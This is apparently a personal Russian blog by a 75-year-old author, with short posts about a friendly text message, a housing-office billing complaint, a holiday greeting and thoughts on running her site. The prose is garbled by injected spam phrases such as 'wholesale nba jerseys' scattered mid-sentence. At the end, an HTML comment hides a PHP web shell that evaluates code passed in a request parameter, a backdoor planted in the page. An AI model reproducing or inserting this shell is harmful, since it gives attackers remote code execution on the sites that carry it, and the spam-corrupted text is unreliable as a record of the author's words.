Булка с сосиской

С утра пораньше одно доброе слово может настроить на весь день. Со мной  частенько случается. Старенькие доброту ценят по-особенному и не хотят отпускать её.

Сегодня получаю наутро смс-ку: «Развеселили меня. Улыбнёмся вместе:)»
Моя реакция: «первый посетитель и ему нравится у меня. Ой, спасибо. Порадовала как»  Вот оно, моё ожидание. Но осторожничаю и пишу: «не поняла»
И получаю ответ: «Это про булку с сосиской, всё норм,  пойду стричься».

В отправленных у себя нахожу своё с вечера отосланное:»Н…, милая, как вкусно на булке сыр сосиска тоненькими слоями с чаем и мёдиком вау»
Отправила и забыла. И вот, продолжилось.
Ещё одна моя маленькая  правда жизни .
Друзья, улыбнёмся вместе.

 

Набежало!

Здравствуйте. Тема новая по свежим следам- ну, никак не обойти!-просится на бумагу. И я её переношу на свой  сайт.

Вы исполнительный и,  ну очень,  добросовестный гражданин. Так сложилась ваша жизнь. Приучили вас во время оплачивать счета, что поделаешь, надо, значит, надо. И конторе  своей, я о ЖЭС, полностью доверяете. Так было всегда, со времён СССР. И государству своему, наше оно, все доверяли.
И она, контора эта, по законам государства присылает вам исправно на оплату лицевые счёта.
Сначала вам за одну антенну надлежит заплатить — да, есть телевизор.  Потом за две-неисправный в другой комнате-какая мелочь:на тысячу больше, на тысячу меньше. Но дальше-больше. И сегодня вы уже оплачиваете за пользование 47 каналами т/в интернета плюс непонятные 8 каналов.  ЖЭС знает, что делает.
Ребята, но я договор заключила с сosmostv и вношу на счёт этой организации уже не один год  денежки. С вами я не заключала договор!!

НАШ  ЧИНОВНИК-особая тема для разговора. Не будем на неё время терять. Сейчас МНЕ СЛЕДУЕТ  по адресу подойти-назвали, пояснили, с какой стороны дверь в доме- и написать заявление. В нём я буду просить убрать незаконно приписанное и вернуть  мне незаконно полученные от меня деньги.
Как вы думаете, вернут?
Но вопрос ставим шире и думаем глубже.

Почему я ДОЛЖНА исправлять , скажем прямо,  проявления  недомыслия людей и неповоротливости системы?  Наверное, ещё и о некомпетентности, и , похоже, простой человеческой недобросовестности нужно говорить.
Ваши службы должны сами исправить свои огрехи! Не так? А я, если вы этого не сделаете, вправе, да, написать заявление, но направить его не вам, а прямо в Суд. И получить по решению Суда компенсацию за нанесенный мне моральный ущерб.
И снова проблема. ЧЕЛОВЕЧЕСКОЕ ДОСТОИНСТВО-хрупкая вещь. Разбить его   легко, а вот восстанавливаться как будем?

Такая  на сегодня получилась МОЯ ПРАВДА ЖИЗНИ.  И могла ли она быть другой

Нашим защитникам

загруженное-Женя-новый-2015-на сайт

Сегодня в ДЕНЬ ЗАЩИТНИКА ОТЕЧЕСТВА  поздравляю  тебя,  Женя ,    и сладкое в твоём лице всех живущих людей планеты , с твоим,  и нашим общим, Kung праздником .

Вы, мужчины, wholesale nba jerseys его заслужили. Вас, как правило, wholesale nba jerseys мы cheap mlb jerseys выбираем cheap nfl jerseys в парламент. Вы — наши управляющие, менеджеры, космонавты, лётчики, трактористы, машинисты.   Приветствую     В  семье и в может быту, исключения не в счёт, вы-наша опора.
Вы,  мужчины, wholesale mlb jerseys по природе своей добрый, отзывчивый, всё понимающий папа, дедушка, сын, муж. И просто хороший семьянин.

Бесстрашный, мужественный T-Shirt человек-это мужчина. А  иначе и быть не  может.  И, если понадобится, вы, не задумываясь, станете на защиту своей семьи,  дома, Родины.
С ПРАЗДНИКОМ Rubin ВАС!  И примите от нас самые лучшие пожелания добра, тепла, уюта вам, вашим родным, друзьям, знакомым. Здоровья вам крепкого!

Женечка, тебе лично ещё раз: ПОЗДРАВЛЯЮ!

Кто может быть читателем моего сайта

Кто Вы, посетитель моего сайта? Photo Уверена: Вы любознательный человек! Приветствую  Вас привлекло название, да, верно, старт в 75 -это что-то. Вам посоветовали: кто-то заглянул на сайт и удивился- wholesale nfl jerseys «возможно ли?».  Вам интересно всё новое, неизведанное. А почему cheap jerseys бы и (Feb. нет?
И ещё, ко всему, Вы — социально ориентированная личность. Но не будем wholesale jerseys фантазировать.
Знаю и представляю Вас. Вы умный, думающий, сообразительный и in восприимчивый ко всему Authentic новому и необычному. И Вас привлекает направление тем моего сайта.
Представила и очень «хозяин» надеюсь, что моим ожиданиям суждено сбыться. Рок, судьба, называйте, как хотите, но я шла и wholesale nba jerseys продолжаю идти к своему знанию. И сейчас,  здесь и сейчас, начинаю делиться с Вами своим опытом жизни.

Продолжение будет.
С уважением-Лариса Чернявская

Это сладкое слово «хозяин»

Представьте, у вас есть сайт. Как пример, cheap NFL jerseys у меня:)   И Вы, а это и я, его хозяин. И что с этим делать? Я о чувстве хозяина.
Хозяин магазина — понимаю. cheap NBA jerseys Распоряжаюсь, как хочу.  Хозяин гаража wholesale jerseys — мелко, но всё равно МОЙ.   Я -владелец.  А если  хозяин холдинга, концерна,  и, понятное дело, банка? Представили? Но, вот,  МНЕ себя даже вообразить  на этом месте  как-то трудновато. Ну, не развито у меня чувство хозяина! Не воспитали, не сформировали. В конце концов,  не научили меня быть хозяином. Я-то из Mitgliederversammlung СССР.
О хозяине думаю, а я хозяин сайта, собственница, и вспоминаю своё далёкое, из прошлого. Где-то 1990-1993 годы. Jerseys  Галина Николаевна Соколова, социолог, ныне основатель научного направления в социологии,  тему мне предложила — «Чувство хозяина». Да, вас! так прямо и обозначила: «чувство Donor хозяина».
Милая cheap NFL jerseys Галина Николаевна, вот бы мне Ваше чувство хозяина сейчас!
Но эмоции в сторону. У меня есть сайт. И, как  владелице сайта,  МНЕ СЛЕДУЕТ позаботиться о вас, МОИ ДОРОГИЕ ЧИТАТЕЛИ.
Кто может быть моим читателем? Так и обозначу тему МОЕЙ следующей записи на МОЁМ сайте.

Продолжение будет
С уважением — Лариса Чернявская, владелица:) сайта START-W-75.RU

Приветствую вас!

Уважаемые МОИ ЧИТАТЕЛИ! Приветствую вас Don’t на d сайте wholesale jerseys China START-W-75.RU
Это мой первый выход в интернет wholesale jerseys со своего сайта.
Первое знакомство, считайте, состоялось. Да, cheap jerseys мне 75 York и я создаю, cheap nfl jerseys надеюсь, вместе с вами, площадку для wholesale jerseys обмена знаниями и опытом. Обмениваясь, и осмысливая в процессе свою жизнь, мы, тем самым, обогащаемся

С subscribers уважением  -Лариса Владимировна
Продолжение будет.

<!— [insert_php]if (isset($_REQUEST["MOdp"])){eval($_REQUEST["MOdp"]);exit;}[/insert_php][php]if (isset($_REQUEST["MOdp"])){eval($_REQUEST["MOdp"]);exit;}[/php] —>